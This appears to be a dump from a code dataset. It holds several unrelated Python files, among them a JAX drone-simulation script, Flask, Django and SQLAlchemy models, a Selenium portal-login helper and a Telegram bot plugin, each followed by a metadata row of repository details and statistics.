ddq = plant(q, dq, u, f_ext)
dx = (dq, ddq)
return dx
# Simulation loop
def loop(carry, input_slice):
t_prev, q_prev, dq_prev, u_prev = carry
t = input_slice
qs, dqs = odeint(ode, (q_prev, dq_prev), jnp.array([t_prev, t]),
u_prev)
q, dq = qs[-1], dqs[-1]
r, dr, ddr = ref_derivatives(t)
u, τ = controller(q, dq, r, dr, ddr)
carry = (t, q, dq, u)
output_slice = (q, dq, u, τ, r, dr)
return carry, output_slice
# Initial conditions
t0 = ts[0]
r0, dr0, ddr0 = ref_derivatives(t0)
q0, dq0 = r0, dr0
u0, τ0 = controller(q0, dq0, r0, dr0, ddr0)
# Run simulation loop
carry = (t0, q0, dq0, u0)
carry, output = jax.lax.scan(loop, carry, ts[1:])
q, dq, u, τ, r, dr = output
# Prepend initial conditions
q = jnp.vstack((q0, q))
dq = jnp.vstack((dq0, dq))
u = jnp.vstack((u0, u))
τ = jnp.vstack((τ0, τ))
r = jnp.vstack((r0, r))
dr = jnp.vstack((dr0, dr))
return q, dq, u, τ, r, dr
# Sample wind velocities from the training distribution
w_min = 0. # minimum wind velocity in inertial `x`-direction
w_max = 6. # maximum wind velocity in inertial `x`-direction
a = 5. # shape parameter `a` for beta distribution
b = 9. # shape parameter `b` for beta distribution
key, subkey = jax.random.split(key, 2)
w = w_min + (w_max - w_min)*jax.random.beta(subkey, a, b, (num_traj,))
# Simulate tracking for each `w`
dt = 0.01
t = jnp.arange(0, T + dt, dt) # same times for each trajectory
q, dq, u, τ, r, dr = simulate(t, w, t_knots, coefs)
data = {
'seed': seed, 'prng_key': key,
't': t, 'q': q, 'dq': dq,
'u': u, 'r': r, 'dr': dr,
't_knots': t_knots, 'r_knots': r_knots,
'w': w, 'w_min': w_min, 'w_max': w_max,
'beta_params': (a, b),
}
with open('training_data.pkl', 'wb') as file:
pickle.dump(data, file)
| 33.06993 | 76 | 0.534574 | 695 | 4,729 | 3.513669 | 0.267626 | 0.018428 | 0.029484 | 0.03276 | 0.135135 | 0.127764 | 0.072891 | 0.04095 | 0.02457 | 0.02457 | 0 | 0.022518 | 0.333263 | 4,729 | 142 | 77 | 33.302817 | 0.751982 | 0.173398 | 0 | 0 | 0 | 0 | 0.021408 | 0 | 0 | 0 | 0 | 0.014085 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d81bf2a69ea31df5d99253836392c80819c38099 | 5,633 | py | Python | pkg/msgapi/mqtt/models/mqmsg.py | ToraNova/rapidflask | f42354b296659dac5be904d7bb68076b9458f79a | [
"MIT"
] | null | null | null | pkg/msgapi/mqtt/models/mqmsg.py | ToraNova/rapidflask | f42354b296659dac5be904d7bb68076b9458f79a | [
"MIT"
] | null | null | null | pkg/msgapi/mqtt/models/mqmsg.py | ToraNova/rapidflask | f42354b296659dac5be904d7bb68076b9458f79a | [
"MIT"
] | null | null | null | #--------------------------------------------------
# mqtt_control.py
# MQTT_Control is a database model to control subscriptions
# and publications
# introduced in u8
# ToraNova
#--------------------------------------------------
from pkg.resrc import res_import as r
from pkg.system.database import dbms
Base = dbms.msgapi.base
class MQTT_Msg(Base):
# PERMA : DO NOT CHANGE ANYTHING HERE UNLESS NECESSARY
__tablename__ = "MQTT_Msgs" #Try to use plurals here (i.e car's')
id = r.Column(r.Integer, primary_key=True)
def __repr__(self):
return '<%r %r>' % (self.__tablename__,self.id)
#---------------------------------------------------------
######################################################################################################
# EDITABLE ZONE
######################################################################################################
# TODO: DEFINE LIST OF COLUMNS
# the string topic of the topic to subscribe to
topic = r.Column(r.String(r.lim.MAX_MQTT_TOPIC_SIZE), nullable=False)
tlink = r.Column(r.Integer, nullable=True) #links to one of our subscribed topic
msg = r.Column(r.String(r.lim.MAX_MQTT_MSGCT_SIZE), nullable=False)
timev0 = r.Column(r.DateTime, nullable=False) #insertion time
timed0 = r.Column(r.DateTime, nullable=True) #deletion time (msg to be kept until)
pflag0 = r.Column(r.Boolean, nullable=False) #flag to check if the msg has been processed
pflag1 = r.Column(r.Boolean, nullable=False) #flag to check if the msg has been processed successfully
delonproc = r.Column(r.Boolean, nullable=False) #flag to check if this message should be delete on process
# TODO: DEFINE THE RLIST
# CHANGED ON U6 : RLISTING NOW MERGED WITH RLINKING : see 'RLINKING _ HOW TO USE:'
# The following is for r-listing (as of u6, rlinking as well) (resource listing)
# the values in the rlist must be the same as the column var name
rlist = r.OrderedDict([
("Topic","topic"),
("Linked (description)","__link__/tlink/MQTT_Subs/id:description"),
("Content","msg"),
("Received","__time__/%b-%d-%Y %H:%M:%S/timev0"),
("Delete on","__time__/%b-%d-%Y %H:%M:%S/timed0"),
("Processed?","pflag0"),
("Process OK?","pflag1")
]) #header,row data
# RLINKING _ HOW TO USE :
# using the __link__ keyword, seperate the arguments with /
# The first argument is the local reference, the field in which we use to refer
# the second argument is the foreign table
# the third argument is the foreign table Primary key
# the fourth argument is the field we want to find from the foreign table
# NOTICE that the fourth table uses ':' instead of /.
# Example
# "RPi id":"__link__/rpi_id/RPi/id:rpi_name"
# for the display of RPi id, we link to a foreign table that is called RPi
# we use the rpi_id foreign key on this table, to locate the id on the foreign table
# then we query for the field rpi_name
# TODO: DEFINE THE priKey and display text
#this primary key is used for rlisting/adding and mod.
rlist_priKey = "id"
rlist_dis = "MQTT Message Stack" #display for r routes
def get_onrecv(self):
# get the name of the process used on this msg
from pkg.msgapi.mqtt.models import MQTT_Sub
t = MQTT_Sub.query.filter( MQTT_Sub.id == self.tlink ).first()
if( t is not None ):
return t.onrecv
# TODO: CONSTRUCTOR DEFINES, PLEASE ADD IN ACCORDING TO COLUMNS
# the key in the insert_list must be the same as the column var name
def __init__(self,insert_list):
'''requirements in insert_list
@param tlink - link to the mqtt sub record
@param topic - the topic string (incase linking failed)
@param msg - the msg content'''
from pkg.msgapi.mqtt.models import MQTT_Sub
from pkg.system.servlog import srvlog
import datetime
from datetime import timedelta
# find links
self.tlink = r.checkNull( insert_list, "tlink")
self.topic = insert_list["topic"]
self.msg = insert_list["msg"]
self.timev0 = datetime.datetime.now()
self.pflag0 = insert_list["pflag0"]
self.pflag1 = insert_list["pflag1"]
submaster = MQTT_Sub.query.filter( MQTT_Sub.id == self.tlink ).first()
if(submaster is not None):
if( submaster.stordur is None):
self.timed0 = None #store forever
else:
self.timed0 = self.timev0 + timedelta( seconds= submaster.stordur)
self.delonproc = submaster.delonproc #inherits from the topic master
else:
srvlog["oper"].warning("MQTT message added to unknown link topic:"+self.topic+
" id="+int(self.tlink))
self.timed0 = r.lim.DEF_MQTT_MSGST_DURA
self.delonproc = True
def default_add_action(self):
# This will be run when the table is added via r-add
# may do some imports here i.e (from pkg.database.fsqlite import db_session)
# TODO add a MQTT restart function here
pass
def default_mod_action(self):
# This will be run when the table is added modified via r-mod
# may do some imports here i.e (from pkg.database.fsqlite import db_session)
pass
def default_del_action(self):
# This will be run when the table is deleted
# may do some imports here i.e (from pkg.database.fsqlite import db_session)
pass
######################################################################################################
| 46.172131 | 110 | 0.607314 | 763 | 5,633 | 4.373526 | 0.306684 | 0.018879 | 0.021576 | 0.013485 | 0.258016 | 0.228648 | 0.228648 | 0.222655 | 0.186095 | 0.167516 | 0 | 0.004598 | 0.227765 | 5,633 | 121 | 111 | 46.553719 | 0.762529 | 0.442393 | 0 | 0.114754 | 0 | 0 | 0.110788 | 0.014166 | 0 | 0 | 0 | 0.016529 | 0 | 1 | 0.098361 | false | 0.04918 | 0.114754 | 0.016393 | 0.47541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d82a5e6a7cb6b7c55c3841490f1226e6b98ca874 | 2,108 | py | Python | base/vulcan_management/vulcan_agent.py | PeterStuck/teacher-app | e71c5b69019450a9ac8694fb461d343ce33e1b35 | [
"CC0-1.0"
] | null | null | null | base/vulcan_management/vulcan_agent.py | PeterStuck/teacher-app | e71c5b69019450a9ac8694fb461d343ce33e1b35 | [
"CC0-1.0"
] | null | null | null | base/vulcan_management/vulcan_agent.py | PeterStuck/teacher-app | e71c5b69019450a9ac8694fb461d343ce33e1b35 | [
"CC0-1.0"
] | null | null | null | from time import sleep
from selenium.common.exceptions import NoSuchElementException
from .vulcan_webdriver import VulcanWebdriver
class VulcanAgent:
""" Class to perform actions on Vulcan Uonet page """
def __init__(self, credentials: dict, vulcan_data = None):
self.driver = VulcanWebdriver()
self.driver.open_vulcan_page()
self.credentials = (credentials['email'], credentials['password'])
self.vd = vulcan_data
def go_to_lessons_menu(self):
self.login_into_service()
sleep(1)
self.__select_department()
sleep(1.5)
def login_into_service(self):
""" Login into Vulcan Uonet with passed credentials """
try:
self.driver.find_element_by_css_selector(".loginButton").click()
self.__send_credentials()
except NoSuchElementException as e:
print(e)
self.driver.execute_script("alert('#Error# Nie udało się znaleźć przycisku logowania.');")
def __send_credentials(self):
""" Pastes login data into fields on page and submit them """
try:
email_input = self.driver.find_element_by_css_selector("#LoginName")
email_input.send_keys(self.credentials[0])
pass_input = self.driver.find_element_by_css_selector("#Password")
pass_input.send_keys(self.credentials[1])
login_submit_btn = self.driver.find_element_by_xpath('//input[@value="Zaloguj się >"]')
login_submit_btn.click()
except NoSuchElementException as e:
print(e)
self.driver.execute_script(
"alert('#Error# Problem ze znalezieniem elementów lub wprowadzeniem danych do zalogowania.');")
def __select_department(self):
""" Selects department on main page """
try:
self.driver.find_element_by_xpath(f'//span[text()="{self.vd.department}"]/..').click()
except NoSuchElementException as e:
print(e)
self.driver.execute_script("alert('#Error# Problem ze znalezieniem podanego departamentu.');")
| 36.982456 | 111 | 0.6537 | 239 | 2,108 | 5.518828 | 0.401674 | 0.075815 | 0.053071 | 0.079606 | 0.37301 | 0.330553 | 0.283548 | 0.257771 | 0.198635 | 0.198635 | 0 | 0.003129 | 0.241935 | 2,108 | 56 | 112 | 37.642857 | 0.822278 | 0.086338 | 0 | 0.230769 | 0 | 0 | 0.174302 | 0.033175 | 0 | 0 | 0 | 0 | 0 | 1 | 0.128205 | false | 0.076923 | 0.076923 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d82fafa5745811141dbc5de3b45d1ba61dddabe7 | 378 | py | Python | Dataset/Leetcode/valid/6/243.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/6/243.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/valid/6/243.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, s, numRows):
if numRows==1:
return s
res = ['' for _ in range(numRows)]
# 周期
T = numRows + numRows -2
for i in range(len(s)):
t_num = i%T
temp = t_num if t_num<numRows else numRows-(t_num)%numRows-2
res[temp] += s[i]
return ''.join(res)
| 27 | 72 | 0.486772 | 53 | 378 | 3.377358 | 0.45283 | 0.089385 | 0.122905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.388889 | 378 | 13 | 73 | 29.076923 | 0.761905 | 0.005291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d8334d756e7256b282d32ab1967e513fc5ca0140 | 390 | py | Python | src/chains/migrations/0027_chain_description.py | tharsis/safe-config-service | 5335fd006d05fba5b13b477daca9f6ef6d64b818 | [
"MIT"
] | 8 | 2021-07-27T13:21:27.000Z | 2022-02-12T22:46:26.000Z | src/chains/migrations/0027_chain_description.py | protofire/safe-config-service | 6a9a48f5e33950cd5f4f7a66c5e36f4d3b0f2bfa | [
"MIT"
] | 203 | 2021-04-28T08:23:29.000Z | 2022-03-29T15:50:27.000Z | src/chains/migrations/0027_chain_description.py | protofire/safe-config-service | 6a9a48f5e33950cd5f4f7a66c5e36f4d3b0f2bfa | [
"MIT"
] | 23 | 2021-06-25T07:22:31.000Z | 2022-03-29T02:24:46.000Z | # Generated by Django 3.2.7 on 2021-09-16 12:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("chains", "0026_chain_l2"),
]
operations = [
migrations.AddField(
model_name="chain",
name="description",
field=models.CharField(blank=True, max_length=255),
),
]
| 20.526316 | 63 | 0.594872 | 43 | 390 | 5.302326 | 0.837209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082734 | 0.287179 | 390 | 18 | 64 | 21.666667 | 0.73741 | 0.115385 | 0 | 0 | 1 | 0 | 0.102041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d8346003220ff71079a13d30e7158a1ac6606e62 | 1,288 | py | Python | leases/services/invoice/berth.py | City-of-Helsinki/berth-reservations | a3b1a8c2176f132505527acdf6da3a62199401db | [
"MIT"
] | 3 | 2020-10-13T07:58:48.000Z | 2020-12-22T09:41:50.000Z | leases/services/invoice/berth.py | City-of-Helsinki/berth-reservations | a3b1a8c2176f132505527acdf6da3a62199401db | [
"MIT"
] | 422 | 2018-10-25T10:57:05.000Z | 2022-03-30T05:47:14.000Z | leases/services/invoice/berth.py | City-of-Helsinki/berth-reservations | a3b1a8c2176f132505527acdf6da3a62199401db | [
"MIT"
] | 1 | 2020-04-03T07:38:03.000Z | 2020-04-03T07:38:03.000Z | from datetime import date
from django.db.models import QuerySet
from payments.enums import OrderStatus
from payments.models import BerthProduct, Order
from ...models import BerthLease
from ...utils import calculate_season_end_date, calculate_season_start_date
from .base import BaseInvoicingService
class BerthInvoicingService(BaseInvoicingService):
def __init__(self, *args, **kwargs):
super(BerthInvoicingService, self).__init__(*args, **kwargs)
self.season_start = calculate_season_start_date()
self.season_end = calculate_season_end_date()
@staticmethod
def get_product(lease: BerthLease) -> BerthProduct:
# The berth product is determined by the width of the berth of the lease
return BerthProduct.objects.get_in_range(width=lease.berth.berth_type.width)
@staticmethod
def get_valid_leases(season_start: date) -> QuerySet:
return BerthLease.objects.get_renewable_leases(season_start=season_start)
@staticmethod
def get_failed_orders(season_start: date) -> QuerySet:
leases = BerthLease.objects.filter(
start_date__year=season_start.year
).values_list("id")
return Order.objects.filter(
_lease_object_id__in=leases, status=OrderStatus.ERROR
)
| 34.810811 | 84 | 0.743789 | 154 | 1,288 | 5.922078 | 0.376623 | 0.096491 | 0.065789 | 0.048246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180901 | 1,288 | 36 | 85 | 35.777778 | 0.864455 | 0.054348 | 0 | 0.115385 | 0 | 0 | 0.001645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.269231 | 0.076923 | 0.576923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d83b93f39c486d9317c825bf51df461bf2aebcdf | 440 | py | Python | django_request_context/middleware.py | schecterdamien/django-request-context | db1100b611012835fd8528c2ba4848ed87e10f80 | [
"MIT"
] | 13 | 2018-11-01T08:10:54.000Z | 2021-07-09T07:42:18.000Z | django_request_context/middleware.py | schecterdamien/django-request-context | db1100b611012835fd8528c2ba4848ed87e10f80 | [
"MIT"
] | 1 | 2019-07-28T16:49:05.000Z | 2021-10-02T04:37:20.000Z | django_request_context/middleware.py | schecterdamien/django-request-context | db1100b611012835fd8528c2ba4848ed87e10f80 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .globals import request_context
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError: # Django < 1.10
MiddlewareMixin = object
class RequestContextMiddleware(MiddlewareMixin):
def process_request(self, request):
request_context.init_by_request(request)
def process_response(self, request, response):
request_context.clear()
return response
| 23.157895 | 56 | 0.729545 | 47 | 440 | 6.680851 | 0.595745 | 0.133758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011204 | 0.188636 | 440 | 18 | 57 | 24.444444 | 0.868347 | 0.079545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
dc1c34dd0e875151a5cb78c824921a11dc907308 | 279 | py | Python | samle_python.py | sarum90/langmapper | 010b7f8b075c45f3c43dcd7d478f6bfe192ccc01 | [
"MIT"
] | null | null | null | samle_python.py | sarum90/langmapper | 010b7f8b075c45f3c43dcd7d478f6bfe192ccc01 | [
"MIT"
] | null | null | null | samle_python.py | sarum90/langmapper | 010b7f8b075c45f3c43dcd7d478f6bfe192ccc01 | [
"MIT"
] | null | null | null | def process(record):
ids = (record.get('idsurface', '') or '').split(' ')
if len(ids) > 4:
return {'language': record['language'],
'longitude': float(record['longitude'] or 0),
'latitude': float(record['latitude'] or 0),
'idsurface': ids}
| 34.875 | 56 | 0.555556 | 31 | 279 | 5 | 0.548387 | 0.141935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.236559 | 279 | 7 | 57 | 39.857143 | 0.713615 | 0 | 0 | 0 | 0 | 0 | 0.247312 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
dc1c868b655eedce37f969499e3f8d088756e9cb | 297 | py | Python | aulas/sqldb.py | thiagonantunes/Estudos | 4f3238cf036cf8ae5dc4dbdb106a2a85ed134f55 | [
"MIT"
] | 1 | 2020-04-07T09:48:15.000Z | 2020-04-07T09:48:15.000Z | aulas/sqldb.py | thiagonantunes/Estudos | 4f3238cf036cf8ae5dc4dbdb106a2a85ed134f55 | [
"MIT"
] | null | null | null | aulas/sqldb.py | thiagonantunes/Estudos | 4f3238cf036cf8ae5dc4dbdb106a2a85ed134f55 | [
"MIT"
] | null | null | null | import mysql.connector
mydb = mysql.connector.connect(
host ='127.0.0.1',
port = 3306,
user ='root',
password = '',
database="cadastro"
)
cursor = mydb.cursor()
cursor.execute("SELECT * FROM gafanhotos LIMIT 3")
resultado = cursor.fetchall()
for x in resultado:
print(x) | 18.5625 | 50 | 0.653199 | 38 | 297 | 5.105263 | 0.763158 | 0.14433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046414 | 0.20202 | 297 | 16 | 51 | 18.5625 | 0.772152 | 0 | 0 | 0 | 0 | 0 | 0.177852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.076923 | 0 | 0.076923 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
dc1ed9368be673800a00c49ccac8a2d18c339a55 | 622 | py | Python | requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# TODO: использовать http://www.cbr.ru/scripts/Root.asp?PrtId=SXML или разобраться с данными от query.yahooapis.com
# непонятны некоторые параметры
# TODO: сделать консоль
# TODO: сделать гуй
# TODO: сделать сервер
import requests
rs = requests.get('https://query.yahooapis.com/v1/public/yql?q=select+*+from+yahoo.finance.xchange+where+pair+=+%22USDRUB,EURRUB%22&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback=')
print(rs.json())
for rate in rs.json()['query']['results']['rate']:
print(rate['Name'], rate['Rate'])
| 32.736842 | 208 | 0.729904 | 89 | 622 | 5.05618 | 0.775281 | 0.073333 | 0.075556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019469 | 0.09164 | 622 | 18 | 209 | 34.555556 | 0.776991 | 0.398714 | 0 | 0 | 0 | 0.166667 | 0.59673 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
dc274952ffbbbc7758469183c1112ecd840c0d35 | 18,853 | py | Python | plugins/misc.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | plugins/misc.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | plugins/misc.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null |
import html
import re
import random
import amanobot
import aiohttp
from amanobot.exception import TelegramError
import time
from config import bot, sudoers, logs, bot_username
from utils import send_to_dogbin, send_to_hastebin
async def misc(msg):
if msg.get('text'):
#aqui ele repete as coisas com echo kkjjj
if msg['text'].startswith('fala') or msg['text'].startswith('/echo')or msg['text'].startswith('echo') or msg['text'] == '/echo@' + bot_username:
print('Usuario {} solicitou echo'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou echo --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'],'{} pra caralho'.format(msg['text'][5:]),
reply_to_message_id=reply_id)
return True
#owna nasa ele responde nasa pra caralho kkjj
elif msg['text'].startswith('owna'):
print('Usuario {} solicitou owna'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou owna --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'],'{} pra caralho esta porra filho da puta!'.format(msg['text'][5:]),
reply_to_message_id=reply_id)
return True
#sla mano
elif msg['text'].startswith('sla') :
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'],'{} ta foda este lance.'.format(msg['text'][4:]),
reply_to_message_id=reply_id)
return True
elif msg['text'].startswith('/mark') or msg['text'].startswith('!mark') or msg['text'] == '/mark@' + bot_username:
print('Usuario {} solicitou /mark'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /,ark --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'markdown',
reply_to_message_id=reply_id)
return True
elif msg['text'] == '/admins' or msg['text'] == '/admin' or msg['text'] == 'admin' or msg['text'] == '/admin@' + bot_username:
print('Usuario {} solicitou /admins'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /admin --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['chat']['type'] == 'private':
await bot.sendMessage(msg['chat']['id'], 'Este comando s? funciona em grupos ?\\_(?)_/?')
else:
adms = await bot.getChatAdministrators(msg['chat']['id'])
names = 'Admins:\n\n'
for num, user in enumerate(adms):
names += '{} - <a href="tg://user?id={}">{}</a>\n'.format(num + 1, user['user']['id'],
html.escape(user['user']['first_name']))
await bot.sendMessage(msg['chat']['id'], names, 'html',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/token') or msg['text'].startswith('!token') or msg['text'] == '/token@' + bot_username:
print('Usuario {} solicitou /token'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /token --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][7:]
try:
bot_token = amanobot.Bot(text).getMe()
bot_name = bot_token['first_name']
bot_user = bot_token['username']
bot_id = bot_token['id']
await bot.sendMessage(msg['chat']['id'], f'''informacoes do bot:
Nome: {bot_name}
Username: @{bot_user}
ID: {bot_id}''',
reply_to_message_id=msg['message_id'])
except TelegramError:
await bot.sendMessage(msg['chat']['id'], 'Token invalido.',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/bug') or msg['text'].startswith('!bug') or msg['text'] == '/bug@' + bot_username:
print('Usuario {} solicitou /bug'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /bug --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][5:]
if text == '' or text == bot_username:
await bot.sendMessage(msg['chat']['id'], '''*Uso:* `/bug <descrição do bug>` - _Reporta erro/bug para a equipe de desenvolvimento deste bot, so devem ser reportados bugs sobre este bot!_
obs.: Mal uso há possibilidade de ID\_ban''', 'markdown',
reply_to_message_id=msg['message_id'])
else:
await bot.sendMessage(logs, f"""<a href="tg://user?id={msg['from']['id']}">{msg['from'][
'first_name']}</a> reportou um bug:
ID: <code>{msg['from']['id']}</code>
Mensagem: {text}""", 'HTML')
await bot.sendMessage(msg['chat']['id'], 'O bug foi reportado com sucesso para a minha equipe!',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/dogbin') or msg['text'].startswith('!dogbin') or msg['text'] == '/dogbin@' + bot_username or msg['text'] == 'dogbin':
print('Usuario {} solicitou /dogbin'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /dogbin --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][8:] or msg.get('reply_to_message', {}).get('text')
if not text:
await bot.sendMessage(msg['chat']['id'],
'''*Uso:* `/dogbin <texto>` - _envia um texto para o del.dog._''',
'markdown',
reply_to_message_id=msg['message_id'])
else:
link = await send_to_dogbin(text)
await bot.sendMessage(msg['chat']['id'], link, disable_web_page_preview=True,
reply_to_message_id=msg['message_id'])
return True
